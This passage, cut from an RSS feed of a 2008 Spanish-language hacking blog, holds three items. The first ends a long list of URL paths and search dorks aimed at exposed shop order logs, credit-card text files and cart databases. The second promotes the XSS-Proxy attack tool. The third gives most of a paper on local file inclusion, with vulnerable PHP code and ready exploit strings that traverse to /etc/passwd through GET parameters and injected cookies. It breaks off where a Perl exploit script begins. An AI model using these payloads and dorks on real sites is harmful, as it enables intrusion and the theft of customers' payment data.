/&gt;/metacart/database/metacart.mdb&lt;br /&gt;//shopping/database/metacart.mdb&lt;br /&gt;/shopping/database/metacart.mdb&lt;br /&gt;/fpdb/shop.mdb&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=usstick&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?display=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?key=8360&amp;amp;preadd=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?key=8360&amp;amp;preadd=action&amp;amp;template=sales.log&lt;br /&gt;/cgi-bin/shopper.exe?key=8360&amp;amp;preadd=action&amp;amp;template=sell.log&lt;br /&gt;/cgi-bin/shopper.exe?key=8360&amp;amp;preadd=action&amp;amp;template=admin.log&lt;br /&gt;/cgi-bin/shopper.exe?key=8360&amp;amp;preadd=action&amp;amp;template=admin_files.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=usstick&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=psiber&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=9461&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=SC7021&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=cc&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?keywords=order&amp;amp;search=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?display=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=moron%20&amp;amp;template=shopper.conf&lt;br /&gt;/Merchant2/modules/log/elf.mv?search=action&amp;amp;ORDERLOG.txt&lt;br /&gt;/Merchant2/modules/log/malf.mv?search=action&amp;amp;ORDERLOG.txt&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=CD006&amp;amp;template=sales.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=sex&amp;amp;template=sell.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=order&amp;amp;template=admin.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=cc&amp;amp;template=admin_files.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=hack&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=9400&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=psiber&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=root%20&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?preadd=action&amp;amp;key=9461&amp;amp;template=order.log&lt;br /&gt;/derbyteccgi/shopper.cgi?key=SC7021&amp;amp;preadd=action&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/cart32/mainframephotographics-ORDERS.txt&lt;br /&gt;/cgi-bin/shopper.cgi&amp;amp;TEMPLATE=ORDER.LOG&lt;br /&gt;/stats/08-hosts.htm&amp;amp;TEMPLATE=ORDER.LOG&lt;br /&gt;/worlddirect/Web_store/Admin_files/order.log&lt;br /&gt;/website/&lt;br /&gt;/WebShop/templates/cc.txt&lt;br /&gt;/WebShop/logs/ck.log&lt;br /&gt;/WebShop/logs/cc.txt&lt;br /&gt;/WebShop/logs/&lt;br /&gt;/WebShop/&lt;br /&gt;/WebCart/orders.txt&lt;br /&gt;/webcart/&lt;br /&gt;/Web_store/Admin_files/order.log&lt;br /&gt;/STORE/orders.txt&lt;br /&gt;/stats/08-hosts.htm&amp;amp;TEMPLATE=ORDER.LOG&lt;br /&gt;/PSUser/PSCOErrPage.htm&lt;br /&gt;/PDG_Cart/shopper.conf&lt;br /&gt;/PDG_Cart/order.log&lt;br /&gt;/PDG_Cart/authorizenets.txt&lt;br /&gt;/PDG/order.txt&lt;br /&gt;/orders/results&lt;br /&gt;/Orders/orders.txt&lt;br /&gt;/orders/order.log&lt;br /&gt;/orders/mountain.cf&lt;br /&gt;/orders/import.txt&lt;br /&gt;/orders/import.txt&lt;br /&gt;/orders/checks.txt&lt;br /&gt;/orders/&lt;br /&gt;/orders.txt&lt;br /&gt;/orders.htm&lt;br /&gt;/orderform/orders.txt&lt;br /&gt;/order.txt&lt;br /&gt;/derbyteccgi/shopper.cgi?key=SC7021&amp;amp;preadd=action&amp;amp;template=order.log&lt;br /&gt;/cgi-local/medstore/loadpage.cgi?user_id=id&amp;amp;file=data/orders.txt&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=%20&amp;amp;template=shopper.conf&lt;br /&gt;/cgi-bin/shopper.exe&lt;br /&gt;/cgi-bin/shopper.cgi&amp;amp;TEMPLATE=ORDER.LOG&lt;br /&gt;/cgi-bin/perlshop.cgi&lt;br /&gt;/cgi-bin/PDG_Cart/cc.log&lt;br /&gt;/cgi-bin/orders/mc.txt&lt;br /&gt;/cgi-bin/orders/cc.txt&lt;br /&gt;/cgi-bin/orders.txt&lt;br /&gt;/cgi-bin/orderlog.txt&lt;br /&gt;/cgi-bin/loadpage.cgi?user_id=id&amp;amp;file=data/db.txt&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm&lt;br /&gt;/cgi-bin/ezmall2000/mall_log_files/order.log&lt;br /&gt;/cgi-bin/cart32/mainframephotographics-ORDERS.txt&lt;br /&gt;/cgi-bin/cart32/CART32-order.txt&lt;br /&gt;/cgi-bin/cart.pl&lt;br /&gt;/ASPSamp/AdvWorks/equipment/catalog_type.asp&lt;br /&gt;/AdvWorks/equipment/catalog_type.asp&lt;br /&gt;/Admin_files/order.log&lt;br /&gt;/admin/Orders/orders.txt&lt;br /&gt;/_private/shopping_cart.mdb&lt;/pre&gt;&lt;br /&gt;esa son la mayoria de las busquedas de dorks y palabras claves que estan haciendo en los motores de busquedas seguiremos actualizando por que a veces encontramos busquedas ridiculas y locas xD...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-3945651243920007402?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/1QlCjiPfBSk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-11-20T17:35:58.457-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/11/palabras-mas-bucadas-en-google-hacking.html</feedburner:origLink></item><item><title>XSS-proxy - Cross Site Scripting herramienta  Automatizada de ataques</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/u3HeRTBMQjs/xss-proxy-cross-site-scripting.html</link><category>Herramientas</category><category>pentest</category><category>XSS</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sat, 25 Oct 2008 23:07:26 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-3189573662772701421</guid><description>&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;XSS-proxy es una Herramienta De Xss Automatizada Cruz-sitio de scripting (XSS) herramienta de ataque.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Los documentos, herramientas y otros contenidos de esta herramienta es asuniendo  que tienen una comprensión básica de &lt;a href="http://www.cert.org/advisories/CA-2000-02.html"&gt;XSS&lt;/a&gt; cuestiones y métodos de explotación existentes.&lt;/span&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Si no está familiarizado con XSS y, a continuación, le recomiendo que visite alguno de los enlaces / docs de abajo para obtener una mejor idea de lo que es XSS y la forma de detectar, arreglar, y se aprovechan de ella.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.darknet.org.uk/2006/06/cross-site-scripting-xss/"&gt;Cross Site Scripting (XSS)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.cert.org/advisories/CA-2000-02.html"&gt;CERT info on XSS&lt;/a&gt;&lt;br /&gt;&lt;p&gt; &lt;a href="http://www.cgisecurity.com/articles/xss-faq.shtml"&gt;CGISecurity’s Cross Site Scripting FAQ&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.technicalinfo.net/papers/CSS.html"&gt;Gunter Ollmann’s XSS paper&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.securityfocus.com/archive/1/191390"&gt;PeterW’s Cross Site Request Forgery (CSRF) Concept&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.securenet.de/papers/Session_Riding.pdf"&gt;SecureNet’s Session Riding paper&lt;/a&gt;&lt;/p&gt;&lt;span style="" onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;strong&gt;Algunas ideas falsas acerca de XSS&lt;/strong&gt;&lt;/span&gt; &lt;ul&gt;&lt;li&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;em&gt;"Un usuario tiene que hacer clic en un vínculo que estén afectados por XSS."&lt;/em&gt; No - si usted visita una página &lt;/span&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; el navegador se ejecutará independientemente de que usted haga clic en un enlace.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; cuidadosamente este ejemplo por lo que no se ejecute en su navegador, pero me podría haber puesto las etiquetas de secuencias de comandos reales / comandos aquí y te hizo correr entonces transparente.&lt;/span&gt; &lt;/li&gt;&lt;li&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; &lt;em&gt;"XSS sólo &lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;pasa en boletines&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; , blogs y otros sitios en los que un atacante puede cargar script de contenido."&lt;/em&gt; Esa es una forma en que el ataque puede suceder, pero un atacante también puede aprovechar los sitios que permiten HTML / SCRIPT etiquetas que se refleja de vuelta a la mismo usuario (como un formulario de búsqueda que se repite lo que fue informado de que debe buscar en la respuesta).&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Estas fallas son comúnmente combinado con redirecciones  a sitios público o mensajes de correo electrónico para atacar a un segundo sitio.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;em&gt;"No.. sólo los ataques XSS crean ventanas emergentes, alertas y otras cosas molestas?"&lt;/em&gt; No - Normalmente se utilizan para revelar las cookies o la forma de acceso basada en la información a los atacantes.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Después de obetner esta información, el atacante la utiliza para entrar en el mismo sitio que tú.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;em&gt;"Yo entiendo los XSS, pero no creo que es un enorme problema".&lt;/em&gt;&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Creo que usted cambia de opinión una vez que comprendes este avanzado ataque.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Lea las cosas avanzadas y por debajo de jugar con XSS-proxy para ver cómo realmente lo mal que un XSS puede ser.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;p&gt; &lt;span style="" onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Puede descargar XSS-proxy aquí:&lt;/span&gt;&lt;/p&gt;&lt;a href="http://sourceforge.net/project/showfiles.php?group_id=130402&amp;amp;package_id=142941&amp;amp;release_id=545299"&gt;XSS-Proxy_0_0_12-book.pl&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;o leer mas &lt;a href="http://xss-proxy.sourceforge.net/"&gt;AKA&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-3189573662772701421?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/u3HeRTBMQjs" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-25T23:07:26.320-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.securenet.de/papers/Session_Riding.pdf" length="218974" type="application/pdf" /><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/xss-proxy-cross-site-scripting.html</feedburner:origLink></item><item><title>fucking the Web Apps [LFI #1 - attack edition by JosS</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/JDt1SMwy15o/fucking-web-apps-lfi-1-attack-edition.html</link><category>manuales</category><category>papers</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 24 Oct 2008 09:34:14 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6888094905229703431</guid><description>&lt;pre&gt;﻿=-|=========================================-{ www.spanish-hackers.com }-====|&lt;br /&gt;=-| fucking the Web Apps [LFI #1 - attack edition]-==========================|&lt;br /&gt;=-|==========================================================================|&lt;br /&gt;=-[ By JosS &lt;spanish-hackers.com&gt; ]-=========================-[ 07/10/2008]-=|  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;____                  __                              __    __               &lt;br /&gt;/\  _`\               /\ \      __                    /\ \__/\ \              &lt;br /&gt;\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  &lt;br /&gt;\ \  _\/\ \/\ \  /'___\ \ , &lt; \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\&lt;br /&gt; \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/&lt;br /&gt;  \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\&lt;br /&gt;   \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/&lt;br /&gt;                                               /\____/                       &lt;br /&gt;                                               \_/__/                        &lt;br /&gt;__      __          __          ______                           &lt;br /&gt;/\ \  __/\ \        /\ \        /\  _  \                          &lt;br /&gt;\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ &lt;br /&gt;\ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\&lt;br /&gt; \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\&lt;br /&gt;  \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/&lt;br /&gt;   '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/&lt;br /&gt;                                            \ \_\   \ \_\        &lt;br /&gt;                                             \/_/    \/_/        &lt;br /&gt;                                                       &lt;br /&gt;                                                       Local File Inclusion #1&lt;br /&gt;                                                                attack edition&lt;br /&gt;&lt;br /&gt;-[ INFOS ]-----------------------------------------------------------------------&lt;br /&gt;Title: "fucking the Web Apps [LFI #1]"&lt;br /&gt;Version: attack edition&lt;br /&gt;Author: JosS&lt;br /&gt;&lt;br /&gt;mail: sys-project[at]hotmail[dot]com&lt;br /&gt;site: http://spanish-hackers.com&lt;br /&gt;team: Spanish Hackers Team - [SHT]&lt;br /&gt;date: 2008-10-07&lt;br /&gt;&lt;br /&gt;-[ SUMMARY ]---------------------------------------------------------------------&lt;br /&gt; 0x00: Introducción&lt;br /&gt; 0x01: Local File Inclusion&lt;br /&gt; 0x02: Exploits&lt;br /&gt; 0x03: Créditos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;                              ___ for the sake ___&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------[ 0x00.- Introducción ]&lt;br /&gt;&lt;br /&gt;Hola a todos los que están hoy aquí leyendo este 'paper' ya bien sea para repasar&lt;br /&gt;conocimientos ya adquiridos o bien para profundizar y extender sus conocimientos.&lt;br /&gt;&lt;br /&gt;Antes de empezar con la breve introducción sobre que leerás en este documento,&lt;br /&gt;quisiera presentarme. Me hago llamar JosS y soy el fundador de Spanish Hackers Team,&lt;br /&gt;una de mis pasiones dentro del ámbito informático es la de investigación de&lt;br /&gt;vulnerabilidades (Bug Research) especialmente en aplicaciones webs (Web Apps) que&lt;br /&gt;será el tema que tocaremos en este 'paper'. Les dejo mi perfil de milw0m por si&lt;br /&gt;quieren saber más de mí.&lt;br /&gt;&lt;br /&gt;id: 1248&lt;br /&gt;profile: http://milw0rm.com/author/1248&lt;br /&gt;&lt;br /&gt;Este texto no es para nada lo que os esperáis al leer el sumario, no vamos&lt;br /&gt;a ver las técnicas en sí, lo que haremos es dejarnos de explicaciones básicas y&lt;br /&gt;pasaremos a profundizar conocimientos. Veremos ejemplos reales no muy comunes,&lt;br /&gt;por si nos pasase en una situación real no nos quedemos con la duda de, ¿ Qué&lt;br /&gt;hago ahora?. A si que podría decir no muy atrevido que este 'paper' te abre&lt;br /&gt;la mente y tus aspiraciones a explotar vulnerabilidades de distintas formas,&lt;br /&gt;básicamente 'Thought hacker'.&lt;br /&gt;&lt;br /&gt;Eso es lo que os espera en este aburrido y divertido 'paper'.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------[ 0x01.- Local File Inclusion ]&lt;br /&gt;&lt;br /&gt;Vamos a ver distintas maneras de como pueden estar provocados los 'LFI' y por&lt;br /&gt;tanto a distinta programación, distinta explotación, esto es lo que buscamos:&lt;br /&gt;una mente abierta. ;)&lt;br /&gt;&lt;br /&gt;[code #1]&lt;br /&gt;&lt;br /&gt;x:  &gt;...&lt;br /&gt;if (isset($_GET["mode"]))&lt;br /&gt;&lt;br /&gt;  {&lt;br /&gt;&lt;br /&gt;    if ($_GET["mode"]=="edit")&lt;br /&gt;&lt;br /&gt;  {&lt;br /&gt;&lt;br /&gt;   if (isset($_GET['id']))&lt;br /&gt;&lt;br /&gt;   {&lt;br /&gt;&lt;br /&gt;     $notefile = $_GET['id'];&lt;br /&gt;&lt;br /&gt;   if ($notefile == "new")&lt;br /&gt;&lt;br /&gt;   {&lt;br /&gt;&lt;br /&gt;    $title = "";&lt;br /&gt;&lt;br /&gt;    $notes = "";&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   else&lt;br /&gt;&lt;br /&gt;   {&lt;br /&gt;&lt;br /&gt;    $temp = "notes/" . $notefile;&lt;br /&gt;&lt;br /&gt;    require($temp);&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;x:  &lt;...&lt;br /&gt;x: }}}&lt;br /&gt;&lt;br /&gt;[ENDcode #1]&lt;br /&gt;&lt;br /&gt;Este es el ejemplo más simple de 'LFI' que veremos. Como vemos no tiene mucha&lt;br /&gt;dificultad para entender su comportamiento.&lt;br /&gt;&lt;br /&gt;1) Comprueba si existe la variable 'mode' pasada por 'GET'. Si el resultado es&lt;br /&gt;  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.&lt;br /&gt;2) Comprueba si existe la variable 'edit' pasada por 'GET'. Si el resultado es&lt;br /&gt;  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.&lt;br /&gt;&lt;br /&gt;Continuamos avanzando ...&lt;br /&gt;&lt;br /&gt;3) Comprueba si existe la variable 'id' pasada por 'GET'. Si el resultado es&lt;br /&gt;  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.&lt;br /&gt;4) Pasa a la variable '$notefile' el valor que asignamos a 'id' por medio de&lt;br /&gt;  'GET' y comprueba si la variable '$notefile' es igual a 'new', en este caso&lt;br /&gt;  nos interesa que no entre en esa sentencia de 'IF', porque no está el include&lt;br /&gt;  que buscamos, a si que haremos que en esa condición obtengamos el valor 0&lt;br /&gt;  y pasemos al else.&lt;br /&gt;5) Asigna a '$temp' una cadena con nuestro valor dentro de ella ($notefile).&lt;br /&gt;6) Por último hace uso de la función 'require' e incluye la cadena '$temp' con&lt;br /&gt;  nuestro valor dentro de ella.&lt;br /&gt;&lt;br /&gt;Exploit: ?mode=edit&amp;amp;id=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;En caso de tener:&lt;br /&gt;$temp = "notes/" . $notefile . ".php";&lt;br /&gt;&lt;br /&gt;El exploit tendría que tener un 'NULL BYTE' (h) al final de la cadena.&lt;br /&gt;&lt;br /&gt;Exploit: ?mode=edit&amp;amp;id=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;Esto fue todo para nuestro primer ejemplo normalito, de moento todo muy&lt;br /&gt;básico, fácil y nada que no se haya visto. ¿Continuámos?&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Después de a ver calentado vamos a por el segundo ejemplo. El código&lt;br /&gt;es vulnerable a 'LFI' mediante la vulnerabilidad de 'Insecure Cookie&lt;br /&gt;Handling'. Me imagino que os preguntaréis: ¿Una vulnerabilidad dentro&lt;br /&gt;de otra? Raro no? ... pues no!. Miremos el ejemplo.&lt;br /&gt;&lt;br /&gt;[code #2]&lt;br /&gt;&lt;br /&gt;if(!empty($_COOKIE['language']) &amp;amp;&amp;amp; !isset($_SESSION['language'])){&lt;br /&gt; $_SESSION['language'] = $_COOKIE['language'];&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;....&lt;br /&gt;&lt;br /&gt;if(LANG == ""){&lt;br /&gt; if(!isset($_SESSION['language'])){&lt;br /&gt;  include("lang/english/lang.php");&lt;br /&gt;  $_LANG = "english";&lt;br /&gt; } else {&lt;br /&gt;  include("lang/".$_SESSION['language']."/lang.php");&lt;br /&gt;  $_LANG = $_SESSION['language'];&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;... }&lt;br /&gt;&lt;br /&gt;[ENDcode #2]&lt;br /&gt;&lt;br /&gt;1) Comprueba si las dos variables "$_COOKIE['language'] y "$_SESSION['language']"&lt;br /&gt;  no están definidas, en el código vemos claramente que no están definidas, por&lt;br /&gt;  lo que entramos de lleno en el 'IF'.&lt;br /&gt;2) Debemos saber que la variable '$_COOKIE' puede ser manipulada por el usuario,&lt;br /&gt;  por lo que esa variable será nuestro vector de ataque. Como vemos en el código&lt;br /&gt;  se le asigna a "$_SESSION['language']" el valor de "$_COOKIE['language']" que&lt;br /&gt;  será introducido por nosotros mediante la vulnerabilidad de 'Insecure Cookie&lt;br /&gt;  Handling'.&lt;br /&gt;3) Comprueba que 'LANG' no tiene valor, en este caso es afirmativo y entramos al&lt;br /&gt;  'IF'.&lt;br /&gt;4) Si no está definida "$_SESSION['language']" entraríamos al 'IF' pero como el&lt;br /&gt;  código pasó el valor de $_COOKIE a $_SESSION, la variable si está definida y&lt;br /&gt;  nos saltaría al 'else'.&lt;br /&gt;5) Dentro del 'else' hace uso de la función 'include' para incluir nuestra cadena.&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;javascript:document.cookie="language=../../../../../../../../../../etc/passwd; path=/";&lt;br /&gt;&lt;br /&gt;Como vemos, tuvimos que añadir el NULL BYTE (h) porqué en el include teníamos una&lt;br /&gt;cadena que se sumaría a la nuestra y evitaría nuestro 'Directory Traversal'.&lt;br /&gt;&lt;br /&gt;¿Tenéis ganas de continuar? ... yo las tendría.&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;En este tercer y penúltimo ejemplo del apartado de 'LFI' tenemos una situación&lt;br /&gt;muy parecida a la del ejemplo 2, solo que esta vez tenemos un intruso, la&lt;br /&gt;función 'explode' de PHP. Abramos la mente y pensemos como un Hacker.&lt;br /&gt;&lt;br /&gt;[code #3]&lt;br /&gt;&lt;br /&gt;x:  &gt;...&lt;br /&gt;if (isset($HTTP_COOKIE_VARS["userInfo"]) &amp;amp;&amp;amp; $HTTP_COOKIE_VARS["userInfo"] != "") {&lt;br /&gt; $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);&lt;br /&gt; $userName = $userArray[0];&lt;br /&gt; $userID = $userArray[1];&lt;br /&gt; $userLang = $userArray[2];&lt;br /&gt; include("include/lang/$userLang/inc.messages.php");&lt;br /&gt; }&lt;br /&gt;x:  &lt;...&lt;br /&gt;&lt;br /&gt;[ENDcode #3]&lt;br /&gt;&lt;br /&gt;Debéis saber que "$HTTP_COOKIE_VARS" también puede ser manipulado por el usuario, no&lt;br /&gt;os encerréis con "$_COOKIE", abriros ...&lt;br /&gt;&lt;br /&gt;1) El único 'IF' del código comprueba que la variable sea distinto a 'nothing', es&lt;br /&gt;  decir que cuando nosotros ejecutemos nuestro 'exploit' daremos valor a&lt;br /&gt;  "$HTTP_COOKIE_VARS["userInfo"]" y por tanto entramos de lleno en el 'IF'.&lt;br /&gt;2) La función 'explode', el intruso que nos quiere fastidiar el 'bug' separa las&lt;br /&gt;  distintas cadenas y las guarda en un 'array'.&lt;br /&gt;3) Fijaros en la linea del 'include', incluye '$userLang' que recoje el tercer valor&lt;br /&gt;  de la cadena que se encuentra en "$HTTP_COOKIE_VARS["userInfo"]".&lt;br /&gt;&lt;br /&gt;Proof of Concept (function 'explode' PHP):&lt;br /&gt;&lt;br /&gt;1)&lt;br /&gt;String = JosS;&lt;br /&gt;[0] = JosS;&lt;br /&gt;[1] = ;&lt;br /&gt;[2] = ; ---&gt; INCLUDE&lt;br /&gt;&lt;br /&gt;2)&lt;br /&gt;String = JosS JosS JosS;&lt;br /&gt;[0] = JosS;&lt;br /&gt;[1] = JosS;&lt;br /&gt;[2] = JosS; ---&gt; INCLUDE&lt;br /&gt;&lt;br /&gt;¿Entendéis?, es decir que deberíamos introducir algo como: basura basura loquenosinteresa&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd; path=/";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;Para el cuarto y último ejemplo para terminar el apartado de 'LFI' tenemos una&lt;br /&gt;situación parecida a la del ejemplo 1, es decir un LFI, que tenemos que jugar&lt;br /&gt;con los 'IF GETS' más la vulnerabilidad que permite el manejo de la 'COOKIE'.&lt;br /&gt;&lt;br /&gt;[code #4]&lt;br /&gt;&lt;br /&gt;x:  &gt;...&lt;br /&gt;if (isset($_GET["mode"]))&lt;br /&gt;  {&lt;br /&gt;    if ($_GET["mode"]=="edit")&lt;br /&gt;  {&lt;br /&gt;   if (isset($_GET['id']))&lt;br /&gt;   {&lt;br /&gt;     $notefile = $_COOKIE['note'];&lt;br /&gt;   if ($notefile == "new")&lt;br /&gt;   {&lt;br /&gt;    $title = "";&lt;br /&gt;    $notes = "";&lt;br /&gt;   }&lt;br /&gt;   else&lt;br /&gt;   {&lt;br /&gt;    $temp = "notes/" . $notefile;&lt;br /&gt;    require($temp);&lt;br /&gt;   }&lt;br /&gt;x:  &lt;...&lt;br /&gt;x: }}}&lt;br /&gt;&lt;br /&gt;[ENDcode #4]&lt;br /&gt;&lt;br /&gt;No voy a explicar nuevamente paso a paso lo que hace este código, ya que lo vimos&lt;br /&gt;en el ejemplo 1 de este apartado.&lt;br /&gt;&lt;br /&gt;Tenemos que tener en cuenta que para que nuestro de valor de '$_COOKIE' se incluya&lt;br /&gt;debemos dar positivo a los 'IF' que nos ayudan a llegar al include de nuestra&lt;br /&gt;'COOKIE'. Entonces nos quedamos con estos dos exploits.&lt;br /&gt;&lt;br /&gt;Exploit 1:&lt;br /&gt;javascript:document.cookie="note=../../../../../../../../../../etc/passwd; path=/";&lt;br /&gt;&lt;br /&gt;Exploit 2: ?mode=edit&amp;amp;id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------[ 0x02.- Exploits ]&lt;br /&gt;&lt;br /&gt;Yo más bien los llamaría "automatizadores" ya que no hacen nada más que simplificar&lt;br /&gt;el proceso y comodidad del usuario. El ejemplo está programado en Perl, ya que&lt;br /&gt;junto a python es lo que más se usa en estos casos. Veamos el código que os tengo&lt;br /&gt;preparado.&lt;br /&gt;&lt;br /&gt;[code #1]&lt;br /&gt;&lt;br 